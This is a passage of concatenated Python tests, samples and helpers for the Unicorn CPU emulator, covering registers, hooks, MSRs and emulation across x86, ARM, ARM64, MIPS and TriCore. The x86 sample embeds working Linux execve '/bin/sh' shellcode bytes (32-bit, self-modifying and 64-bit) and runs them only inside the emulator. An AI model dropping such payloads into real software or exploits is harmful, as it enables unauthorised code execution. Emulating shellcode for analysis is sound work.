    uc.reg_write(UC_X86_REG_RDX, ordx)
    uc.reg_write(UC_X86_REG_RCX, orcx)
    uc.reg_write(UC_X86_REG_RIP, orip)

    return (edx << 32) | (eax & 0xFFFFFFFF)


def set_gs(uc, addr):
    """
    set the GS.base hidden descriptor-register field to the given address.
    this enables referencing the gs segment on x86-64.
    """
    return set_msr(uc, GSMSR, addr)


def get_gs(uc):
    """
    fetch the GS.base hidden descriptor-register field.
    """
    return get_msr(uc, GSMSR)


def set_fs(uc, addr):
    """
    set the FS.base hidden descriptor-register field to the given address.
    this enables referencing the fs segment on x86-64.
    """
    return set_msr(uc, FSMSR, addr)


def get_fs(uc):
    """
    fetch the FS.base hidden descriptor-register field.
    """
    return get_msr(uc, FSMSR)


class TestGetSetMSR(regress.RegressTest):
    def test_msr(self):
        uc = Uc(UC_ARCH_X86, UC_MODE_64)
        uc.mem_map(SCRATCH_ADDR, SCRATCH_SIZE)

        set_msr(uc, FSMSR, 0x1000)
        self.assertEqual(0x1000, get_msr(uc, FSMSR))

        set_msr(uc, GSMSR, 0x2000)
        self.assertEqual(0x2000, get_msr(uc, GSMSR))

    def test_gs(self):
        uc = Uc(UC_ARCH_X86, UC_MODE_64)

        uc.mem_map(SEGMENT_ADDR, SEGMENT_SIZE)
        uc.mem_map(CODE_ADDR, CODE_SIZE)
        uc.mem_map(SCRATCH_ADDR, SCRATCH_SIZE)

        code = b'\x65\x48\x33\x0C\x25\x18\x00\x00\x00'  # xor rcx, qword ptr gs:[0x18]
        uc.mem_write(CODE_ADDR, code)
        uc.mem_write(SEGMENT_ADDR + 0x18, b'AAAAAAAA')

        set_gs(uc, SEGMENT_ADDR)
        self.assertEqual(SEGMENT_ADDR, get_gs(uc))

        uc.emu_start(CODE_ADDR, CODE_ADDR + len(code))

        self.assertEqual(uc.reg_read(UC_X86_REG_RCX), 0x4141414141414141)

    def test_fs(self):
        uc = Uc(UC_ARCH_X86, UC_MODE_64)

        uc.mem_map(SEGMENT_ADDR, SEGMENT_SIZE)
        uc.mem_map(CODE_ADDR, CODE_SIZE)
        uc.mem_map(SCRATCH_ADDR, SCRATCH_SIZE)

        code = b'\x64\x48\x33\x0C\x25\x18\x00\x00\x00'  # xor rcx, qword ptr fs:[0x18]
        uc.mem_write(CODE_ADDR, code)
        uc.mem_write(SEGMENT_ADDR + 0x18, b'AAAAAAAA')

        set_fs(uc, SEGMENT_ADDR)
        self.assertEqual(SEGMENT_ADDR, get_fs(uc))

        uc.emu_start(CODE_ADDR, CODE_ADDR + len(code))

        self.assertEqual(uc.reg_read(UC_X86_REG_RCX), 0x4141414141414141)


if __name__ == '__main__':
    regress.main()



# By Ryan Hileman, issue #91

import regress
from unicorn import *
from unicorn.x86_const import *


class Pshufb(regress.RegressTest):

    def runTest(self):
        uc = Uc(UC_ARCH_X86, UC_MODE_64)
        uc.ctl_set_cpu_model(UC_CPU_X86_HASWELL)

        uc.mem_map(0x2000, 0x1000)

        uc.mem_write(0x2000, b'\x66\x0f\x38\x00\xc1')  # pshufb xmm0, xmm1

        # Invalid instruction -> test failed
        uc.emu_start(0x2000, 0x2005)


if __name__ == '__main__':
    regress.main()



import regress
from unicorn import *
from unicorn.arm_const import *


class MovHang(regress.RegressTest):

    # NOTE: This test was failing when workflow was using ubuntu-latest + qemu. Fixed once switched to native arm runner
    def runTest(self):
        uc = Uc(UC_ARCH_ARM, UC_MODE_ARM)
        uc.mem_map(0x1000, 0x1000)
        uc.mem_write(0x1000, b'\x00\xc0\x00\xe3')  # movw r12, #0

        def hook_block(uc, addr, *args):
            regress.logger.debug('enter block 0x%#06x', addr)
            uc.count += 1

        uc.reg_write(UC_ARM_REG_R12, 0x123)
        self.assertEqual(0x123, uc.reg_read(UC_ARM_REG_R12))

        uc.hook_add(UC_HOOK_BLOCK, hook_block)
        uc.count = 0

        # print 'block should only run once'
        uc.emu_start(0x1000, 0x1004, timeout=500)

        self.assertEqual(0x0, uc.reg_read(UC_ARM_REG_R12))
        self.assertEqual(uc.count, 1)


if __name__ == '__main__':
    regress.main()



""" See https://github.com/unicorn-engine/unicorn/issues/98 """

import regress
from unicorn import *

ADDR = 0xffaabbcc


class RegWriteSignExt(regress.RegressTest):

    def hook_mem_invalid(self, mu, access, address, size, value, user_data):
        regress.logger.debug(">>> Access type: %u, expected value: 0x%x, actual value: 0x%x", access, ADDR, address)

        self.assertEqual(address, ADDR)

        mu.mem_map(address & 0xfffff000, 4 * 1024)
        mu.mem_write(address, b'\xcc')

        return True

    def runTest(self):
        mu = Uc(UC_ARCH_X86, UC_MODE_32)
        mu.reg_write(x86_const.UC_X86_REG_EBX, ADDR)

        mu.mem_map(0x10000000, 1024 * 4)
        # jmp ebx
        mu.mem_write(0x10000000, b'\xff\xe3')

        mu.hook_add(UC_HOOK_MEM_FETCH_UNMAPPED | UC_HOOK_MEM_FETCH_PROT, self.hook_mem_invalid)
        mu.emu_start(0x10000000, 0x10000000 + 2, count=1)


if __name__ == '__main__':
    regress.main()



import regress
import sys
import unittest
from unicorn import *
from unicorn.mips_const import *

CODE = (
    b'\x00\x00\x00\x00'  # nop
    b'\x00\x00\xa4\x8f'  # lw    $a0, 0($sp)
)

BASE = 0x20000000


class MipsExcept(regress.RegressTest):

    @unittest.skipIf(sys.version_info < (3, 7), reason="requires python3.7 or higher")
    def runTest(self):
        uc = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN)

        uc.mem_map(BASE, 0x1000)
        uc.mem_write(BASE, CODE)

        # execute nop. we should be ok
        uc.emu_start(BASE, BASE + len(CODE), count=1)

        # ----------------------------------------

        # set sp to a mapped but unaligned address to read from
        uc.reg_write(UC_MIPS_REG_SP, BASE + 0x801)

        with self.assertRaises(UcError) as m:
            uc.emu_start(BASE + 4, BASE + len(CODE), count=1)

        self.assertEqual(UC_ERR_READ_UNALIGNED, m.exception.errno)

        # ----------------------------------------

        # set sp to an umapped address to read from
        uc.reg_write(UC_MIPS_REG_SP, 0xfffffff0)

        with self.assertRaises(UcError) as m:
            uc.emu_start(BASE + 4, BASE + len(CODE), count=1)

        self.assertEqual(UC_ERR_READ_UNMAPPED, m.exception.errno)

        # ----------------------------------------

        uc.reg_write(UC_MIPS_REG_SP, 0x40000000)

        with self.assertRaises(UcError) as m:
            uc.emu_start(BASE + 4, BASE + len(CODE), count=1)

        self.assertEqual(UC_ERR_READ_UNMAPPED, m.exception.errno)


if __name__ == '__main__':
    regress.main()



#!/usr/bin/env python
# Sample code for ARM64 of Unicorn. Nguyen Anh Quynh <aquynh@gmail.com>
# Python sample ported by Loi Anh Tuan <loianhtuan@gmail.com>

from unicorn import *
from unicorn.arm64_const import *

# code to be emulated
ARM64_CODE = b"\xab\x05\x00\xb8\xaf\x05\x40\x38"  # str x11, [x13]; ldrb x15, [x13]

# MSR code
ARM64_MRS_CODE = b"\x62\xd0\x3b\xd5"  # mrs        x2, tpidrro_el0

# memory address where emulation starts
ADDRESS = 0x10000


# callback for tracing basic blocks
def hook_block(uc, address, size, user_data):
    print(">>> Tracing basic block at 0x%x, block size = 0x%x" % (address, size))


# callback for tracing instructions
def hook_code(uc, address, size, user_data):
    print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" % (address, size))


# Test ARM64
def test_arm64():
    print("Emulate ARM64 code")
    try:
        # Initialize emulator in ARM mode
        mu = Uc(UC_ARCH_ARM64, UC_MODE_ARM)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, ARM64_CODE)

        # initialize machine registers
        mu.reg_write(UC_ARM64_REG_X11, 0x12345678)
        mu.reg_write(UC_ARM64_REG_X13, 0x10008)
        mu.reg_write(UC_ARM64_REG_X15, 0x33)

        # tracing all basic blocks with customized callback
        mu.hook_add(UC_HOOK_BLOCK, hook_block)

        # tracing one instruction with customized callback
        mu.hook_add(UC_HOOK_CODE, hook_code, begin=ADDRESS, end=ADDRESS)

        # emulate machine code in infinite time
        mu.emu_start(ADDRESS, ADDRESS + len(ARM64_CODE))

        # now print out some registers
        print(">>> Emulation done. Below is the CPU context")
        print(">>> As little endian, X15 should be 0x78:")

        x11 = mu.reg_read(UC_ARM64_REG_X11)
        x13 = mu.reg_read(UC_ARM64_REG_X13)
        x15 = mu.reg_read(UC_ARM64_REG_X15)
        print(">>> X15 = 0x%x" % x15)

    except UcError as e:
        print("ERROR: %s" % e)


def test_arm64_read_sctlr():
    print("Read SCTLR_EL1")
    try:
        # Initialize emulator in ARM mode
        mu = Uc(UC_ARCH_ARM64, UC_MODE_ARM)

        # Read SCTLR_EL1
        # crn = 1;
        # crm = 0;
        # op0 = 3;
        # op1 = 0;
        # op2 = 0;
        val = mu.reg_read(UC_ARM64_REG_CP_REG, (1, 0, 3, 0, 0))
        print(">>> SCTLR_EL1 = 0x%x" % val)

    except UcError as e:
        print("ERROR: %s" % e)


def test_arm64_hook_mrs():
    def _hook_mrs(uc, reg, cp_reg, _):
        print(">>> Hook MRS instruction: reg = {reg:#x}(UC_ARM64_REG_X2) cp_reg = {cp_reg}".format(reg=reg,
                                                                                                   cp_reg=cp_reg))
        uc.reg_write(reg, 0x114514)
        print(">>> Write 0x114514 to X")

        # Skip MRS instruction
        return True

    print("Test hook MRS instruction")
    try:
        # Initialize emulator in ARM mode
        mu = Uc(UC_ARCH_ARM64, UC_MODE_ARM)

        # Map an area for code
        mu.mem_map(0x1000, 0x1000)

        # Write code
        mu.mem_write(0x1000, ARM64_MRS_CODE)

        # Hook MRS instruction
        mu.hook_add(UC_HOOK_INSN, _hook_mrs, None, 1, 0, UC_ARM64_INS_MRS)

        # Start emulation
        mu.emu_start(0x1000, 0x1000 + len(ARM64_MRS_CODE))

        print(">>> X2 = {reg:#x}".format(reg=mu.reg_read(UC_ARM64_REG_X2)))

    except UcError as e:
        print("ERROR: %s" % e)


if __name__ == '__main__':
    test_arm64()
    print("=" * 26)
    test_arm64_read_sctlr()
    print("=" * 26)
    test_arm64_hook_mrs()



import regress
from unicorn import *
from unicorn.mips_const import *

CODE = b'\x34\x21\x34\x56'  # ori $at, $at, 0x3456
BASE = 0x10000000


class MipsKernelMMU(regress.RegressTest):
    def test_syscall(self):
        uc = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN)

        uc.mem_map(BASE, 0x1000)
        uc.mem_write(BASE, CODE)
        uc.reg_write(UC_MIPS_REG_AT, 0)

        uc.emu_start(BASE, BASE + len(CODE))

        self.assertEqual(0x3456, uc.reg_read(UC_MIPS_REG_AT))


if __name__ == '__main__':
    regress.main()



"""Common types and structures.
"""
# @author elicn

from abc import abstractmethod
from typing import Any, Generic, Tuple, TypeVar

import ctypes

uc_err	   = ctypes.c_int
uc_engine  = ctypes.c_void_p
uc_context = ctypes.c_void_p
uc_hook_h  = ctypes.c_size_t


VT = TypeVar('VT', bound=Tuple[int, ...])


class UcReg(ctypes.Structure):
    """A base class for composite registers.

    This class is meant to be inherited, not instantiated directly.
    """

    @property
    @abstractmethod
    def value(self) -> Any:
        """Get register value.
        """

        pass

    @classmethod
    @abstractmethod
    def from_value(cls, value) -> 'UcReg':
        """Create a register instance from a given value.
        """

        pass


class UcTupledReg(UcReg, Generic[VT]):
    """A base class for registers whose values are represented as a set
    of fields.

    This class is meant to be inherited, not instantiated directly.
    """

    @property
    def value(self) -> VT:
        return tuple(getattr(self, fname) for fname, *_ in self.__class__._fields_)  # type: ignore

    @classmethod
    def from_value(cls, value: VT):
        if not isinstance(value, tuple):
            raise TypeError(f'got {type(value).__name__} while expecting a tuple')

        if len(value) != len(cls._fields_):
            raise TypeError(f'got {len(value)} elements while expecting {len(cls._fields_)}')

        return cls(*value)


class UcLargeReg(UcReg):
    """A base class for large registers that are internally represented as
    an array of multiple qwords.

    This class is meant to be inherited, not instantiated directly.
    """

    qwords: ctypes.Array

    @property
    def value(self) -> int:
        return sum(qword << (64 * i) for i, qword in enumerate(self.qwords))

    @classmethod
    def from_value(cls, value: int):
        if not isinstance(value, int):
            raise TypeError(f'got {type(value).__name__} while expecting an integer')

        mask = (1 << 64) - 1
        size = cls._fields_[0][1]._length_

        return cls(tuple((value >> (64 * i)) & mask for i in range(size)))


class UcReg128(UcLargeReg):
    """Large register holding a 128-bit value.
    """

    _fields_ = [('qwords', ctypes.c_uint64 * 2)]


class UcReg256(UcLargeReg):
    """Large register holding a 256-bit value.
    """

    _fields_ = [('qwords', ctypes.c_uint64 * 4)]


class UcReg512(UcLargeReg):
    """Large register holding a 512-bit value.
    """

    _fields_ = [('qwords', ctypes.c_uint64 * 8)]


__all__ = ['uc_err', 'uc_engine', 'uc_context', 'uc_hook_h', 'UcReg', 'UcTupledReg', 'UcLargeReg', 'UcReg128', 'UcReg256', 'UcReg512']



import logging
import os
import unittest


class RegressTest(unittest.TestCase):
    """ Regress test case dummy class. """


def main():
    unittest.main()


def __setup_logger(name):
    """ Set up a unified logger for all tests. """

    instance = logging.getLogger(name)
    instance.propagate = False

    if not instance.handlers:
        handler = logging.StreamHandler()
        formatter = logging.Formatter('[%(levelname)s] %(message)s')
        handler.setFormatter(formatter)
        instance.addHandler(handler)

    return instance


logger = __setup_logger('UnicornRegress')
logger.setLevel((os.getenv('REGRESS_LOG_LEVEL') or 'INFO').upper())



# reg_write() can't modify PC from within trace callbacks
# issue #210

import regress
from unicorn import *
from unicorn.arm_const import *

BASE_ADDRESS = 0x10000000
THUMB_CODE = b"\x83\xb0" * 5  # sub sp, #0xc
TARGET_PC = 0xffffffff


class CallBackPCTest(regress.RegressTest):

    def test_instruction_trace(self):
        # initialize emulator in ARM's Thumb mode
        mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB)

        # map some memory
        mu.mem_map(BASE_ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(BASE_ADDRESS, THUMB_CODE)

        # setup stack
        mu.reg_write(UC_ARM_REG_SP, BASE_ADDRESS + 2 * 1024 * 1024)

        def __hook_callback(uc, address, size, user_data):
            regress.logger.debug(">>> Tracing instruction at 0x%x, instruction size = %u", address, size)
            regress.logger.debug(">>> Setting PC to %#x", TARGET_PC)

            uc.reg_write(UC_ARM_REG_PC, TARGET_PC)

        # tracing all instructions with customized callback
        mu.hook_add(UC_HOOK_CODE, __hook_callback)

        # emulate one instruction. since pc was modified to point to an unmapped
        # area, this is expected to fail
        with self.assertRaises(UcError) as raisedEx:
            mu.emu_start(BASE_ADDRESS, BASE_ADDRESS + len(THUMB_CODE), count=1)

        self.assertEqual(UC_ERR_FETCH_UNMAPPED, raisedEx.exception.errno)

        # the block callback set PC to 0xffffffff, so at this point, the PC
        # value should be 0xffffffff.
        self.assertEqual(TARGET_PC, mu.reg_read(UC_ARM_REG_PC) | 0b1)

    def test_block_trace(self):
        # initialize emulator in ARM's Thumb mode
        mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB)

        # map some memory
        mu.mem_map(BASE_ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(BASE_ADDRESS, THUMB_CODE)

        # setup stack
        mu.reg_write(UC_ARM_REG_SP, BASE_ADDRESS + 2 * 1024 * 1024)

        def __hook_callback(uc, address, size, user_data):
            regress.logger.debug(">>> Tracing basic block at 0x%x, block size = 0x%x", address, size)
            regress.logger.debug(">>> Setting PC to %#x", TARGET_PC)

            uc.reg_write(UC_ARM_REG_PC, TARGET_PC)

        # trace blocks with customized callback
        mu.hook_add(UC_HOOK_BLOCK, __hook_callback)

        # emulate one instruction. since pc was modified to point to an unmapped
        # area, this is expected to fail
        with self.assertRaises(UcError) as raisedEx:
            mu.emu_start(BASE_ADDRESS, BASE_ADDRESS + len(THUMB_CODE), count=1)

        self.assertEqual(UC_ERR_FETCH_UNMAPPED, raisedEx.exception.errno)

        # the block callback set PC to 0xffffffff, so at this point, the PC
        # value should be 0xffffffff.
        self.assertEqual(TARGET_PC, mu.reg_read(UC_ARM_REG_PC) | 0b1)


if __name__ == '__main__':
    regress.main()



import regress
import sys
import unittest
from unicorn import *
from unicorn.mips_const import *

CODE = (
    b'\xf8\xff\x01\x24'  # addiu $at, $zero, -8
    b'\x24\xe8\xa1\x03'  # and $sp, $sp, $at
    b'\x09\xf8\x20\x03'  # jalr $t9
    b'\xe8\xff\xbd\x23'  # addi $sp, $sp, -0x18
    b'\xb8\xff\xbd\x27'  # addiu $sp, $sp, -0x48
    b'\x00\x00\x00\x00'  # nop
)

BASE = 0x4010dc


def code_hook(uc, addr, size, user_data):
    regress.logger.debug('code hook: pc=%08x sp=%08x', addr, uc.reg_read(UC_MIPS_REG_SP))


def run(step):
    uc = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN)

    if step:
        uc.hook_add(UC_HOOK_CODE, code_hook)

    uc.reg_write(UC_MIPS_REG_SP, 0x60800000)
    uc.reg_write(UC_MIPS_REG_T9, BASE + len(CODE) - 8)

    regress.logger.debug('sp = %08x', uc.reg_read(UC_MIPS_REG_SP))
    regress.logger.debug('at = %08x', uc.reg_read(UC_MIPS_REG_AT))
    regress.logger.debug('<run> (single step: %s)', str(step))

    uc.mem_map(BASE & ~(0x1000 - 1), 0x2000)
    uc.mem_write(BASE, CODE)
    uc.emu_start(BASE, BASE + len(CODE))

    regress.logger.debug('sp = %08x', uc.reg_read(UC_MIPS_REG_SP))
    regress.logger.debug('at = %08x', uc.reg_read(UC_MIPS_REG_AT))

    return uc.reg_read(UC_MIPS_REG_SP)


class MipsSingleStep(regress.RegressTest):

    @unittest.skipIf(sys.version_info < (3, 7), reason="requires python3.7 or higher")
    def runTest(self):
        sp1 = run(step=False)
        sp2 = run(step=True)

        self.assertEqual(sp1, sp2)


if __name__ == '__main__':
    regress.main()



#!/usr/bin/env python
# Sample code for X86 of Unicorn. 
# Nguyen Anh Quynh <aquynh@gmail.com>
# KaiJern Lau <kj@theshepherdlab.io>

from unicorn import *
from unicorn.x86_const import *

# Original shellcode from this example.
# X86_CODE32 = b"\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x05\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f"

# Linux/x86 execve /bin/sh shellcode 23 bytes, from http://shell-storm.org/shellcode/files/shellcode-827.php
#    0:   31 c0                   xor    eax,eax
#    2:   50                      push   eax
#    3:   68 2f 2f 73 68          push   0x68732f2f
#    8:   68 2f 62 69 6e          push   0x6e69622f
#    d:   89 e3                   mov    ebx,esp
#    f:   50                      push   eax
#   10:   53                      push   ebx
#   11:   89 e1                   mov    ecx,esp
#   13:   b0 0b                   mov    al,0xb
#   15:   cd 80                   int    0x80
X86_CODE32 = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
X86_CODE32_SELF = b"\xeb\x1c\x5a\x89\xd6\x8b\x02\x66\x3d\xca\x7d\x75\x06\x66\x05\x03\x03\x89\x02\xfe\xc2\x3d\x41\x41\x41\x41\x75\xe9\xff\xe6\xe8\xdf\xff\xff\xff\x31\xd2\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xca\x7d\x41\x41\x41\x41\x41\x41\x41\x41"

# Linux/x86 64bit execve /bin/sh shellcode
#    0:   48 31 ff                xor    rdi,rdi
#    3:   57                      push   rdi
#    4:   57                      push   rdi
#    5:   5e                      pop    rsi
#    6:   5a                      pop    rdx
#    7:   48 bf 2f 2f 62 69 6e    movabs rdi,0x68732f6e69622f2f
#    e:   2f 73 68 
#   11:   48 c1 ef 08             shr    rdi,0x8
#   15:   57                      push   rdi
#   16:   54                      push   rsp
#   17:   5f                      pop    rdi
#   18:   6a 3b                   push   0x3b
#   1a:   58                      pop    rax
#   1b:   0f 05                   syscall
X86_CODE64 = b"\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"

# memory address where emulation starts
ADDRESS = 0x1000000


# callback for tracing instructions
def hook_code(uc, address, size, user_data):
    print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" % (address, size))
    # read this instruction code from memory
    tmp = uc.mem_read(address, size)
    print("*** PC = %x *** :" % (address), end="")
    for i in tmp:
        print(" %02x" % i, end="")
    print("")


# callback for tracing basic blocks
def hook_block(uc, address, size, user_data):
    print(">>> Tracing basic block at 0x%x, block size = 0x%x" % (address, size))


def read_string(uc, address):
    ret = ""
    c = uc.mem_read(address, 1)[0]
    read_bytes = 1

    while c != 0x0:
        ret += chr(c)
        c = uc.mem_read(address + read_bytes, 1)[0]
        read_bytes += 1
    return ret


# callback for tracing Linux interrupt
def hook_intr(uc, intno, user_data):
    # only handle Linux syscall
    if intno != 0x80:
        print("got interrupt %x ???" % intno)
        uc.emu_stop()
        return

    eax = uc.reg_read(UC_X86_REG_EAX)
    eip = uc.reg_read(UC_X86_REG_EIP)

    if eax == 1:  # sys_exit
        print(">>> 0x%x: interrupt 0x%x, EAX = 0x%x" % (eip, intno, eax))
        uc.emu_stop()
    elif eax == 4:  # sys_write
        # ECX = buffer address
        ecx = uc.reg_read(UC_X86_REG_ECX)
        # EDX = buffer size
        edx = uc.reg_read(UC_X86_REG_EDX)
        try:
            buf = uc.mem_read(ecx, edx)
            print(">>> 0x%x: interrupt 0x%x, SYS_WRITE. buffer = 0x%x, size = %u, content = " \
                  % (eip, intno, ecx, edx), end="")
            for i in buf:
                print("%c" % i, end="")
            print("")
        except UcError as e:
            print(">>> 0x%x: interrupt 0x%x, SYS_WRITE. buffer = 0x%x, size = %u, content = <unknown>\n" \
                  % (eip, intno, ecx, edx))
    elif eax == 11:  # sys_write
        ebx = uc.reg_read(UC_X86_REG_EBX)
        filename = read_string(uc, ebx)
        print(">>> SYS_EXECV filename=%s" % filename)
    else:
        print(">>> 0x%x: interrupt 0x%x, EAX = 0x%x" % (eip, intno, eax))


def hook_syscall32(mu, user_data):
    eax = mu.reg_read(UC_X86_REG_EAX)
    print(">>> got SYSCALL with EAX = 0x%x" % (eax))
    mu.emu_stop()


def hook_syscall64(mu, user_data):
    rax = mu.reg_read(UC_X86_REG_RAX)
    rdi = mu.reg_read(UC_X86_REG_RDI)

    print(">>> got SYSCALL with RAX = %d" % (rax))

    if rax == 59:  # sys_execve
        filename = read_string(mu, rdi)
        print(">>> SYS_EXECV filename=%s" % filename)

    else:
        rip = mu.reg_read(UC_X86_REG_RIP)
        print(">>> Syscall Found at 0x%x: , RAX = 0x%x" % (rip, rax))

    mu.emu_stop()


# Test X86 32 bit
def test_i386(mode, code):
    if mode == UC_MODE_32:
        print("Emulate x86_32 code")
    elif mode == UC_MODE_64:
        print("Emulate x86_64 code")

    try:
        # Initialize emulator
        mu = Uc(UC_ARCH_X86, mode)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, code)

        # initialize stack
        mu.reg_write(UC_X86_REG_ESP, ADDRESS + 0x200000)

        # tracing all basic blocks with customized callback
        mu.hook_add(UC_HOOK_BLOCK, hook_block)

        # tracing all instructions with customized callback
        mu.hook_add(UC_HOOK_CODE, hook_code)

        if mode == UC_MODE_32:
            # handle interrupt ourself
            mu.hook_add(UC_HOOK_INTR, hook_intr)
            # handle SYSCALL
            mu.hook_add(UC_HOOK_INSN, hook_syscall32, None, 1, 0, UC_X86_INS_SYSCALL)
        elif mode == UC_MODE_64:
            mu.hook_add(UC_HOOK_INSN, hook_syscall64, None, 1, 0, UC_X86_INS_SYSCALL)

        # emulate machine code in infinite time
        mu.emu_start(ADDRESS, ADDRESS + len(code))

        # now print out some registers
        print(">>> Emulation done")

    except UcError as e:
        print("ERROR: %s" % e)


if __name__ == '__main__':
    test_i386(UC_MODE_32, X86_CODE32_SELF)
    print("=" * 20)
    test_i386(UC_MODE_32, X86_CODE32)
    print("=" * 20)
    test_i386(UC_MODE_64, X86_CODE64)



import regress
from unicorn import *
from unicorn.arm_const import *

CODE = (
    b'\x48\x31'  # adds    r1, #0x48
    b'\xff\x57'  # ldrsb   r7, [r7, r7]
    b'\x57\x5e'  # ldrsh   r7, [r2, r1]
    b'\x5a\x48'  # ldr     r0, [pc, #0x168]
    b'\xbf\x2f'  # cmp     r7, #0xbf
    b'\x2f\x62'  # str     r7, [r5, #0x20]
    b'\x69\x6e'  # ldr     r1, [r5, #0x64]
    b'\x2f\x73'  # strb    r7, [r5, #0xc]
    b'\x68\x48'  # ldr     r0, [pc, #0x1a0]

    b'\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05'  # data?
)

BASE = 0x00000000


class WrongRIPArm(regress.RegressTest):

    def runTest(self):
        mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB)

        mu.mem_map(BASE, 2 * 1024 * 1024)
        # write machine code to be emulated to memory
        mu.mem_write(BASE, CODE)
        mu.reg_write(UC_ARM_REG_R13, 1 * 1024 * 1024)

        # emu for maximum 1 instruction.
        mu.emu_start(BASE | 0b1, BASE + len(CODE), count=1)

        self.assertEqual(0x48, mu.reg_read(UC_ARM_REG_R1))
        self.assertEqual(0x2, mu.reg_read(UC_ARM_REG_R15))


if __name__ == '__main__':
    regress.main()



# Added by Peter Mackay, relating to issue 571
# ARM NEON/VFP support seems to exist but is disabled by default
# https://github.com/unicorn-engine/unicorn/issues/571

import regress
from unicorn import *
from unicorn.arm_const import *

CODE = (
    b'\x11\xEE\x50\x1F'  # MRC p15, #0, r1, c1, c0, #2
    b'\x41\xF4\x70\x01'  # ORR r1, r1, #(0xf << 20)
    b'\x01\xEE\x50\x1F'  # MCR p15, #0, r1, c1, c0, #2
    b'\x4F\xF0\x00\x01'  # MOV r1, #0
    b'\x07\xEE\x95\x1F'  # MCR p15, #0, r1, c7, c5, #4
    b'\x4F\xF0\x80\x40'  # MOV r0,#0x40000000
    b'\xE8\xEE\x10\x0A'  # FMXR FPEXC, r0
    b'\x2d\xed\x02\x8b'  # vpush {d8}
)

BASE = 0x1000


class FpVfpDisabled(regress.RegressTest):

    def runTest(self):
        mem_size = 0x1000

        uc = Uc(UC_ARCH_ARM, UC_MODE_THUMB)

        uc.mem_map(BASE, mem_size)
        uc.mem_write(BASE, CODE)
        uc.reg_write(UC_ARM_REG_SP, BASE + mem_size - 4)

        uc.emu_start(BASE + 1, BASE + len(CODE))


if __name__ == '__main__':
    regress.main()



#!/usr/bin/env python

"""
   Created for Unicorn Engine by Eric Poole <eric.poole@aptiv.com>, 2022
   Copyright 2022 Aptiv 
"""

from unicorn import *
from unicorn.tricore_const import *

# code to be emulated
TRICORE_CODE = b"\x82\x11\xbb\x00\x00\x08"  # mov d0, #0x1; mov.u d0, #0x8000
# memory address where emulation starts
ADDRESS = 0x10000


# callback for tracing basic blocks
def hook_block(uc, address, size, user_data):
    print(">>> Tracing basic block at 0x%x, block size = 0x%x" % (address, size))


# callback for tracing instructions
def hook_code(uc, address, size, user_data):
    print(">>> Tracing instruction at 0x%x, instruction size = 0x%x" % (address, size))


# Test TriCore
def test_tricore():
    print("Emulate TriCore code")
    try:
        # Initialize emulator in TriCore mode
        mu = Uc(UC_ARCH_TRICORE, UC_MODE_LITTLE_ENDIAN)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, TRICORE_CODE)

        # tracing all basic blocks with customized callback
        mu.hook_add(UC_HOOK_BLOCK, hook_block)

        # tracing one instruction at ADDRESS with customized callback
        mu.hook_add(UC_HOOK_CODE, hook_code)

        # emulate machine code in infinite time
        mu.emu_start(ADDRESS, ADDRESS + len(TRICORE_CODE))

        # now print out some registers
        print(">>> Emulation done. Below is the CPU context")

        r0 = mu.reg_read(UC_TRICORE_REG_D0)
        print(">>> D0 = 0x%x" % r0)

    except UcError as e:
        print("ERROR: %s" % e)


if __name__ == '__main__':
    test_tricore()



import regress
from unicorn import *
from unicorn.arm64_const import *


class Arm64RegReadWriteW0ThroughW30(regress.RegressTest):
    """
    Testing the functionality to read/write 32-bit registers in AArch64
    See issue #716 
    """

    def runTest(self):
        uc = Uc(UC_ARCH_ARM64, UC_MODE_ARM)

        expected = 0x1234567890abcdef

        uc.reg_write(UC_ARM64_REG_X0, expected)
        self.assertEqual(uc.reg_read(UC_ARM64_REG_X0), expected)
        self.assertEqual(uc.reg_read(UC_ARM64_REG_W0), expected & 0xffffffff)

        # ----------------------------------------------------------

        expected = 0xa1b2c3d4e5f6a7b8

        uc.reg_write(UC_ARM64_REG_X30, expected)
        self.assertEqual(uc.reg_read(UC_ARM64_REG_W30), expected & 0xffffffff)

        expected_lo = 0xaabbccdd

        uc.reg_write(UC_ARM64_REG_W30, expected_lo)
        self.assertEqual(uc.reg_read(UC_ARM64_REG_X30), (expected & ~0xffffffff) | expected_lo)
        self.assertEqual(uc.reg_read(UC_ARM64_REG_W30), expected_lo)


if __name__ == '__main__':
    regress.main()



import regress
from unicorn import *
from unicorn.x86_const import *

CODE = (
    b'\x8e\xe8'              #  mov     gs, eax
    b'\xb8\x01\x00\x00\x00'  #  mov     eax, 1
)

BASE = 0x1000


class MovGsEax(regress.RegressTest):

    def runTest(self):
        uc = Uc(UC_ARCH_X86, UC_MODE_32)

        uc.mem_map(BASE, 0x1000)

        uc.mem_write(BASE, CODE)
